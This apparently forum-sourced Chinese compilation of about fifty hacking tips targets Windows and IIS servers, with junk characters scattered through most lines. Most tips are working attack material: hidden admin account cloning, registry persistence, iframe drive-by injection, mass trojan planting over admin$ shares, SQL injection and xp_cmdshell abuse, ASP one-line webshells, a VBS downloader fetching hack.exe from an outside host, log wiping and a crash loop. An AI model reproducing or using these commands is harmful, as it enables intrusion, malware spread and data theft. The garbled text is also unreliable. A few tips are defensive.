Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 ~4 {4 d3 ?8 p z/ A( y6 icacls C:\windows\system32 /G hqw20:R
* ^! N4 I: ~4 g思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入8 l& M2 o& s2 U, D- A; Q
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; d! p. n/ q9 r! w
0 |" B/ Z; w+ f$ f, `/ w7 {
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。- s+ O4 C0 F% }6 ?4 z0 `
- M* M w/ \( s+ L3 H+ _3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。" r, K/ U) ], `! j. A$ m
* p, R g( x9 g5 t6 ~
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 q* B" m5 H$ M. R) w2 m; ]6 @& N S5 a! u7 ?+ a( g- n" Q
5、利用INF文件来修改注册表
( h7 T$ \# s9 X% t( i% |1 z% N[Version]2 p$ Z8 Z. h0 e# h4 U! j
Signature="$CHICAGO$"+ J* V) x4 l6 {* d5 a- a& _( K
[Defaultinstall]4 K# m- j2 O- E7 }
addREG=Ating
U: h9 E( e8 z# w( _% f: J- ~[Ating]; L& d) k4 S+ `, H: o9 ?0 E6 k
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"$ B, e9 b3 `) e+ f# @. E. f# g
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
# o/ Y- I1 s9 _: x, {6 urundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径 M1 b) J2 }) N' I8 v1 l2 j+ S$ @
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 L: B" c2 K- N: h, tHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# x) g0 g, r/ u& Y! F. }
HKEY_CURRENT_CONFIG 简写为 HKCC
( {! ?& T( r4 m; g' i+ Z0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
# B7 d; F! Y* [0 C7 S( [9 A/ w"1"这里代表是写入或删除注册表键值中的具体数据
5 t% |; K3 L" a* o- H V) y( y- V, E! m4 o* J
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
% T9 S( Q- p9 t( H. _8 P; n. h多了一步就是在防火墙里添加个端口,然后导出其键值1 S- p! n3 d+ z1 {+ \
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 |) p. U! ^, E
* w. U' L9 Y: i% k7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽- ^% g' A; h4 D$ ~) U
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* H- K5 h2 X/ p! l& u% `& S/ G" l+ b. W% y5 h
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
- T+ L% f* Q* o. _+ n
+ _( W+ z! }4 I; ?+ l- c: c9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
) r! C c* l( E: O. G. {) S可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
- ^* B. n6 n( ^/ s* F$ e6 p( K- @# m1 Q# W+ r$ I% w, ]
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
' n4 d7 t3 V$ o+ a4 Z( {4 S9 j5 _
+ g+ E' x6 R) U7 K1 G+ |4 d11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ D3 K- R( ]: Z/ a( o: X6 H* S2 ?用法:xsniff –pass –hide –log pass.txt( k* |# b% O5 q6 C
) C! E: {0 g1 w' o12、google搜索的艺术
0 V) L0 g/ s7 p9 D& r3 @1 \: V搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”( v3 @+ V8 {# o: H B- h
或“字符串的语法错误”可以找到很多sql注入漏洞。
+ x- l, ^* D' K [0 Q9 ~4 ~+ ]$ V! f0 u; k
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
/ H" k& `0 c+ G+ X! W4 q0 d. R3 T
) U) g9 _$ @6 W& a14、cmd中输入 nc –vv –l –p 1987 R) }+ N) c5 H
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃0 Z- z: H1 I5 c+ f- I, s& J, b9 z7 k
( ~5 ^( ^4 o0 H( y4 a8 v W) X15、制作T++木马,先写个ating.hta文件,内容为0 V' K, q1 a% B0 B5 S6 h8 ~" Q
<script language="VBScript">
: d" L7 N/ U$ P8 E2 Aset wshshell=createobject ("wscript.shell" )
1 L" F9 g9 O9 b- k, o1 f! z1 ha=wshshell.run("你马的名称",1)) d& f. B6 t9 Y
window.close# K: K3 {; z6 F- d
</script>4 S3 s5 Z6 [, X$ T8 r7 c9 y9 H
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 J3 u6 o8 g0 b1 d1 W5 ~
- ]- ] Y% R. e/ J: E/ c- i
16、搜索栏里输入; S- M; ]5 t4 l3 p) d S/ m" K
关键字%'and 1=1 and '%'='
1 F3 \1 S& g6 R& ^& D关键字%'and 1=2 and '%'='1 ~# ~9 J" }- f4 ?! X
比较不同处 可以作为注入的特征字符
) e a% m. u6 k3 r4 v
9 t) I) I; u2 }, A i3 ~/ {) x17、挂马代码<html>
3 E8 ~4 L5 f; a+ {/ c- z( a d5 d<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) }1 ^' ^0 ]* Z% T: m</html>, H# M- c2 m6 ]- z
% q( r" b4 o' i5 s2 Q% E' y9 P18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,& X8 d6 _# O E" ^$ ~$ C6 O: a9 R
net localgroup administrators还是可以看出Guest是管理员来。! J; }0 ~0 m, a) Q! ^' ?1 Y7 {
- v/ J+ L x/ ~/ {
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, q& N0 \/ u& {2 Z
用法: 安装: instsrv.exe 服务名称 路径% W- S$ b$ y4 ^. w1 d. s1 v0 D
卸载: instsrv.exe 服务名称 REMOVE; j* |: s; x% `! [- r) C
* {$ I6 E9 j/ X/ n6 i) D
+ u" H# n- H' u R, v z9 v4 U9 Y21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 M! }" M0 w9 }: p
不能注入时要第一时间想到%5c暴库。! o. A' T4 c8 u8 W& T: _
" }) R6 _: J& r& @. M- M2 w( \22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~" |! `$ g/ {' o3 ]0 ]3 U4 }- ?
5 {4 B, z( z) w, |3 X23、缺少xp_cmdshell时
. i8 q9 P+ r5 a. [3 C& s- D1 C尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& m: @! T& V, b
假如恢复不成功,可以尝试直接加用户(针对开3389的)$ |9 \- z. \+ ?$ M" @# V
declare @o int
3 B4 ]3 _" ~1 ~3 }2 k( M( q/ B5 Cexec sp_oacreate 'wscript.shell',@o out
1 T9 u% q( h" ] m; Xexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
+ q. h/ {# a6 B. o2 ~- }2 M) F/ ~. z7 W8 [ U$ g' D7 Y
24.批量种植木马.bat
, n1 h5 J. V! A5 Z: b6 }for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中( j( E( X5 I! u/ `/ a% c6 @
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 B: I b8 c) p8 D' q
扫描地址.txt里每个主机名一行 用\\开头
+ D4 w9 M$ L) l: V3 D$ t* T$ }- D& ~; E7 m- M
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 b& {% z0 ?/ x
; m3 X- w' t/ y5 K26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& h7 _' S& `4 Q4 Q( H: _将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.: w# w; H g. c7 b1 c V: Q1 V9 J
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& c6 c% x1 ]' U4 Z: J' K
P9 Q9 ]1 B! W27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 i9 E' A( }. I9 J" u然后用#clear logg和#clear line vty *删除日志+ v6 M: [, x1 T( r# W3 ?
6 @& G3 x, G( l6 c
28、电脑坏了省去重新安装系统的方法 k1 M8 g! P+ R+ k( | U
纯dos下执行,
3 T. z6 f( \# L- pxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config7 L3 c& @3 j& V
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config b4 Y! y: H# T& J( ~. K8 W
" X" e: _4 _# D0 Y
29、解决TCP/IP筛选 在注册表里有三处,分别是:6 Q0 y1 w a/ P1 K
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 Z! O- l$ k. F# B/ }+ Z; h8 _HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: x& c: X, X% M3 m
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' H6 ~9 J, D: P* `# o( b. L
分别用( V5 c s0 K4 O3 ^$ P% o
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 Q( o! j0 s" v, _* K C) yregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip$ g" X" H! \1 b9 g, k E
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 W j1 i Q2 K( E/ y. m
命令来导出注册表项
% Z' |5 U6 U8 d$ ?, e6 Y) T然后把三个文件里的EnableSecurityFilters"=dword:00000001,( N9 _: M9 b7 ~$ g4 c
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; }2 X2 K" r. v$ _8 G* t) Z+ b( D* ^regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。# b3 `! m, f% R" `# w
. X5 Z7 h% N/ }2 {
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U$ G9 C# u) K, l B9 T" p. Y
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的31 b3 d+ X( N* M2 \: N+ |1 d
$ @$ S5 J! j( C0 M+ m A: z# ~
31、全手工打造开3389工具6 s, e G: E$ M5 x
打开记事本,编辑内容如下:9 V. M1 O+ V: s0 _8 B
echo [Components] > c:\sql/ h! P( Q( N9 G& V% c y
echo TSEnable = on >> c:\sql
+ [2 _8 }9 f% |, H. psysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 ?' U! R9 r. c# q; I5 N% K+ u编辑好后存为BAT文件,上传至肉鸡,执行
' |7 q) P( ?& s4 [# C' ?: {9 u6 e7 g3 k) D; L" u- v5 h' H
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
8 S" | e y! T s( w4 g7 f; h2 |0 e2 ]" Y, D
33、让服务器重启7 i8 w: c2 c! Y3 q- }; d! F1 q, Y
写个bat死循环:$ s& [, Y, O3 }- b+ g, S2 s
@echo off
- o4 [0 ~+ p) [$ j:loop1
6 V3 O" R2 u w! A# d+ gcls
2 l5 A1 Y1 a0 R, j; ~! U2 {2 ostart cmd.exe
- m5 V! O; d0 ^& x) x0 i hgoto loop1
3 \ ?+ E% @7 i: a& c, o保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
. s$ p) }: H( c( Y* D% j4 ?
5 \, |- K- Z8 T' Q2 z4 f* G34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,6 ]6 k- B# c( m/ F& J. e$ c* ?3 Q
@echo off
; g0 a5 G7 r c9 c. g Jdate /t >c:/3389.txt* `8 D9 I( V8 |5 Z
time /t >>c:/3389.txt
! ^3 w& X% n, O- E) e' `attrib +s +h c:/3389.bat
; h2 q( y; ^( |% W+ k% Zattrib +s +h c:/3389.txt2 ~ E9 Q, \2 p% s r7 v
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
8 s, B1 Z+ j/ d- q( x d& u2 n并保存为3389.bat
9 b% D. n, U( o7 z1 G" _" u- j打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号: y: L1 U" M; ?! W+ P
. L# v; y& C( X* }, [; \) I35、有时候提不了权限的话,试试这个命令,在命令行里输入:
7 s" i& A+ @, ]# s' hstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- Z9 y/ m3 O9 e; f3 Y' Q1 g# n
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- G) |' h( r: _5 V
7 G) f) v2 b9 Q6 r' ]
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 x+ Q$ {4 B b
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 O8 d! q' O2 j9 |# h4 A
echo 你的FTP账号 >>c:\1.bat //输入账号
! d2 t1 Y; o! P, Vecho 你的FTP密码 >>c:\1.bat //输入密码0 T* n: O) \. H3 E7 ?. U' k& l
echo bin >>c:\1.bat //登入
) O' [1 E1 b0 F6 {; ]% D7 Uecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 ^* T7 o) `$ hecho bye >>c:\1.bat //退出/ ?( M" ^8 Y7 ?6 t
然后执行ftp -s:c:\1.bat即可
' J6 ~, ]' O4 ]1 g% f5 L+ I+ X ^ d
37、修改注册表开3389两法- K& |! s; M! k8 X+ G4 ^
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表8 C! ]. T0 K" i+ @0 y
echo Windows Registry Editor Version 5.00 >>3389.reg
0 Y" v% H* y' l, k9 u1 a: n, Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) P7 P5 K' w7 \9 R2 X1 v$ Y% e
echo "Enabled"="0" >>3389.reg, x( E6 p8 v h+ w2 m: x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows3 P! n, X H# B9 v
NT\CurrentVersion\Winlogon] >>3389.reg! o9 D+ ]/ p: R. y0 Q% R8 |
echo "ShutdownWithoutLogon"="0" >>3389.reg) I( d+ Q& n/ V) V9 r. u D# L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
0 V7 f& ~5 b$ |) |! {& b( s>>3389.reg; a4 l4 p4 C6 d* s* W o( S) x
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 Q v$ s% G) \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]5 {! l. G* U/ k! i9 _& {* W$ Z
>>3389.reg( y5 f ]4 i& [1 ~
echo "TSEnabled"=dword:00000001 >>3389.reg
" g2 e$ l! b- ?# I+ c \' zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg( _+ X E* a3 P. I' ]/ Z# e& l2 X" |
echo "Start"=dword:00000002 >>3389.reg
4 x' A/ Z& J1 @9 \. s' P# L) vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ I0 \& z" O4 @>>3389.reg% J/ W% }1 }! \# c) s8 ~ U% S
echo "Start"=dword:00000002 >>3389.reg
$ g' A* V) t# ?- h% a v+ |echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
' f2 |6 X9 S! z9 s; c+ u5 Wecho "Hotkey"="1" >>3389.reg* ^0 I: X0 a& G+ A! [: @; f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 O7 Z3 S. l9 H+ t4 S) O
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
" t% v; w; D- I7 P0 |- J! Y$ c v, [echo "PortNumber"=dword:00000D3D >>3389.reg
9 u( k) q8 V' l2 a: Y2 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. \: M( v( Z9 a( U( W2 L6 q. l; bServer\WinStations\RDP-Tcp] >>3389.reg
( P1 c/ f9 k" _* decho "PortNumber"=dword:00000D3D >>3389.reg3 @7 D; }# _8 v( S) Y$ E3 y9 |
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。/ G8 t: w d9 J# J; w' }
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& B# {: _! N3 n: S1 ^1 H3 d# _# P因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 K' x0 y9 e4 c( ~ \1 A
(2)winxp和win2003终端开启: i! _. ~0 K' @
用以下ECHO代码写一个REG文件:6 c% B* |1 }1 p
echo Windows Registry Editor Version 5.00>>3389.reg) j/ r6 f* d6 W/ \- v' Y% b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. x! X9 I! P% n$ y$ IServer]>>3389.reg: v9 @7 S2 H# b$ ]
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! Y$ k& f2 Q. g- p N8 o9 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& P, u( ]; z' `3 R+ n# s3 K( v% ~6 NServer\Wds\rdpwd\Tds\tcp]>>3389.reg
4 T" A) _: ~( Q s. m9 l4 J/ _+ }) techo "PortNumber"=dword:00000d3d>>3389.reg
- s8 Q$ O2 r) }, f6 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- H6 x- k8 Z# W R1 E
Server\WinStations\RDP-Tcp]>>3389.reg- G' X0 u9 q/ M3 ]
echo "PortNumber"=dword:00000d3d>>3389.reg
2 r- \6 D O4 ]( j然后regedit /s 3389.reg del 3389.reg
0 e' ]; Y* M& E# tXP下不论开终端还是改终端端口都不需重启
- d" l* B, O' t: t+ a' p: O4 v1 K' D, z$ j
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
' v. V" u# h- E0 L* ~用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! p2 r0 Y! h" }& m: b8 \/ `0 F
' H5 m- v8 ^- k4 |8 a8 j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
+ H9 v) A5 k) y. k! W(1)数据库文件名应复杂并要有特殊字符
) G8 B8 k4 ]4 A, G7 l& E(2)不要把数据库名称写在conn.asp里,要用ODBC数据源3 p* ~5 n; N# j) }/ D
将conn.asp文档中的- m# d7 }3 z. ^
DBPath = Server.MapPath("数据库.mdb"): B: X' o7 i% k$ X; u& _. j
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ c, Q) q% H7 R3 R( \1 H( u. S3 j4 d) k' B/ M+ I' t c3 d
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& e q a ?* t9 w5 Y5 _2 {(3)不放在WEB目录里
5 c5 ^. v; `7 A# n/ M) f$ c! O, z0 b% v
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉( [. K! A1 ]* v' n+ R
可以写两个bat文件
% v6 W4 c' F* z+ a* ~( k@echo off
8 B3 S4 V4 N1 Q! R; r@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. V" d' c0 ~6 d k@del c:\winnt\system32\query.exe* X' |& U( k3 D
@del %SYSTEMROOT%\system32\dllcache\query.exe
; i: r7 ]4 `1 p& [@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ w: N2 d2 p9 o. z# W4 E6 p U8 a% Y' ~
@echo off$ m" {; `( M) ?
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
0 y# d4 l/ D; A1 s& B+ x@del c:\winnt\system32\tsadmin.exe
* j; S: }, \, H@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
. H% e) S+ _7 ]% o4 P4 u6 L$ R( ` n* w
41、映射对方盘符
9 P! R( X M* M stelnet到他的机器上,
7 j. b* ~1 c6 h2 snet share 查看有没有默认共享 如果没有,那么就接着运行, T$ W% ^1 t$ u8 j3 [% }4 ^2 p
net share c$=c:; a, f7 i" P. z5 F/ _! ]' h, P/ o
net share现在有c$. Q M3 @7 {- Q" C) K' q1 K6 D
在自己的机器上运行' q3 }" b t; X4 x6 G
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
^1 ^0 g0 Y4 z) q8 n, g3 q5 n* B$ F+ o) A6 ?* ]
42、一些很有用的老知识
2 j: \5 f, F! W- Ftype c:\boot.ini ( 查看系统版本 )! d D O) [8 ?& C1 H
net start (查看已经启动的服务)
; `- U- A. I9 kquery user ( 查看当前终端连接 )
9 r- ~1 F/ G5 f3 c8 j$ t+ snet user ( 查看当前用户 )/ n- @( _/ b$ w& M
net user 用户 密码/add ( 建立账号 )
+ Y" y6 A/ |) Y& `+ o# J& Onet localgroup administrators 用户 /add (提升某用户为管理员)
( m! x0 l* K6 a9 Hipconfig -all ( 查看IP什么的 )
5 C" O2 v; I$ G7 l1 C+ @3 @netstat -an ( 查看当前网络状态 )
( D$ c* Z/ R, f9 Xfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ u' w t1 n/ I# y3 p) o
克隆时Administrator对应1F4. L+ O) n0 D7 y0 Z! H4 Q( z9 M- @
guest对应1F5 z! Y1 x) o& X. H
tsinternetuser对应3E8
+ V* a! L4 C/ t: Y0 l. c: o' f) \6 ]
43、如果对方没开3389,但是装了Remote Administrator Service
" v! n% t5 e: Y8 S' ]用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% c7 b" l" v% `' k( x9 b3 n/ `% W
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
_* Y/ L, X G9 q x3 v% q% S先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! X2 u; |* M: }4 D9 T* x; H$ U
* Q: N% ]) f* ~; ~44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定): L9 i* ]3 D9 Z2 C! \ h
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)% u6 g. N$ M; N$ ]+ y# Q) s) h
% K, Q# r. |& A/ f `, u# B
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)% y+ T0 o9 U: _
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
6 ^4 ^1 L! Q* A9 H! N6 D( K. [^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =8 _' a' U5 c3 d; m l5 w) T2 R- f
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- `' j u; k2 `( S
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs, n7 O( r7 `$ M9 h% t4 W4 E" P( N
(这是完整的一句话,其中没有换行符)
. g+ j" Z7 y. S: {0 v然后下载:
1 Q$ T( s1 s# B8 xcscript down.vbs http://www.hack520.org/hack.exe hack.exe
: s2 t6 J f) s, u \. k5 n7 J; o% ^7 K1 w$ F" j
46、一句话木马成功依赖于两个条件:
! j, m. O& F U- Z. L9 k1、服务端没有禁止adodb.Stream或FSO组件
8 I% @0 `% s& p9 C; _( Y* e' x2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。7 s* x0 M3 s* ?& d
?% ?6 V5 I. g# S9 U8 a& j% q: D; Q
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. g9 F0 a' G+ J# q;alter database utsz set RECOVERY FULL--' T0 w' x, Z6 R& m% Z* Y. x
;create table cmd (a image)--( ~. t( C8 [* N
;backup log utsz to disk = 'D:\cmd' with init--
I" _+ E/ m2 W m4 M;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 Y5 @6 d$ B# b, S6 R, K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: x& N8 g3 X3 ^6 S' W# M
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( r; s8 C, p7 P5 l0 Q8 ~1 u6 R
; X2 I* J9 _& m+ Y: W) B# N
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置: A# x2 m" ?( M1 a x
: T: x- r( ~) I5 w& F* B2 T
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 x" w6 X/ g% \( M8 q! p8 W
所有会话用 'all'。
& Z% k% @3 W" ^0 F# X-s sessionid 列出会话的信息。
7 d' \3 {+ ^8 C. p8 X1 c-k sessionid 终止会话。3 q0 \$ @8 q( m" c. p
-m sessionid 发送消息到会话。
$ n7 R0 d* T4 \* y
% W) M# Q# S1 G1 i. E/ p* F+ w0 Dconfig 配置 telnet 服务器参数。
8 s; W4 P- e Z
+ I, P( X" P5 j0 e( n# Ycommon_options 为:
/ c! h# Y3 f6 Y6 H4 r-u user 指定要使用其凭据的用户9 y! w7 R& [, \2 z8 l
-p password 用户密码. u( l7 c5 U+ p, Z* [
9 ~# }9 v. r+ S' r3 E
config_options 为:; c( d k' u: S; p, K4 Y% `: i
dom = domain 设定用户的默认域
% T- C9 R3 w2 y2 }/ e% j8 Nctrlakeymap = yes|no 设定 ALT 键的映射
1 |) d. D3 \. n; [5 y! z& {7 ]& d8 ltimeout = hh:mm:ss 设定空闲会话超时值4 K% ^0 r8 O0 O0 X2 S# F
timeoutactive = yes|no 启用空闲会话。# a" ^: ]% x# Y+ t/ J2 A
maxfail = attempts 设定断开前失败的登录企图数。- o1 N- z' y/ a& U
maxconn = connections 设定最大连接数。: b( r7 ^4 [. Z+ b1 L) U( u
port = number 设定 telnet 端口。; ~: J1 z: N) I( }0 x
sec = [+/-]NTLM [+/-]passwd
2 i) t9 L* `6 t) Y, |4 w设定身份验证机构
/ F- h5 G& ~, cfname = file 指定审计文件名。) }0 W1 a: W6 l: j0 R
fsize = size 指定审计文件的最大尺寸(MB)。. y. P w3 s2 _" c0 q
mode = console|stream 指定操作模式。) O% L9 q, [9 n7 i9 Z5 i! r
auditlocation = eventlog|file|both" E8 ~* H7 m0 U \8 G% v/ A4 D
指定记录地点$ O0 k) P9 L" h; }& ]
audit = [+/-]user [+/-]fail [+/-]admin9 j0 b1 G$ O4 i |
" {$ H" D7 |6 k0 o8 G
49、例如:在IE上访问:
# Y5 b: R+ ^, Q( ]www.hack520.org/hack.txt就会跳转到http://www.hack520.org/% `& a6 }1 @) ^1 B9 |
hack.txt里面的代码是:
. h' h4 ~5 R* @! g: O* w* d<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"># h1 V% y' P2 Q+ c6 f) h8 o
把这个hack.txt发到你空间就可以了!, ~5 [! l1 V) W6 U
这个可以利用来做网马哦!9 g1 _$ G. L& ]4 ]- z* z
* h, ?4 d) y1 p1 }
50、autorun的病毒可以通过手动限制!. b$ S* }, G' z
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 A7 d8 q. g0 p% T2 ^/ O2,打开盘符用右键打开!切忌双击盘符~
6 I' L4 k2 m5 ]3 J3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!/ b/ W# [% p5 D" D3 l8 G% y
$ w9 i3 `7 T8 Y% a: I$ H! ]
51、log备份时的一句话木马:
) \- u' Y/ m* ^$ m' g6 qa).<%%25Execute(request("go"))%%25>
# b! ?' z1 N7 \" F* @9 ?b).<%Execute(request("go"))%>4 c/ }: [- C' @6 g- b9 m% P+ @
c).%><%execute request("go")%><%
& S: r3 i' k- v+ o" Fd).<script language=VBScript runat=server>execute request("sb")</Script>
- x& ^4 Q2 f2 m. w8 L4 Ge).<%25Execute(request("l"))%25>
/ ]( {2 H, J/ X* k+ x" A# e2 Yf).<%if request("cmd")<>"" then execute request("pass")%>
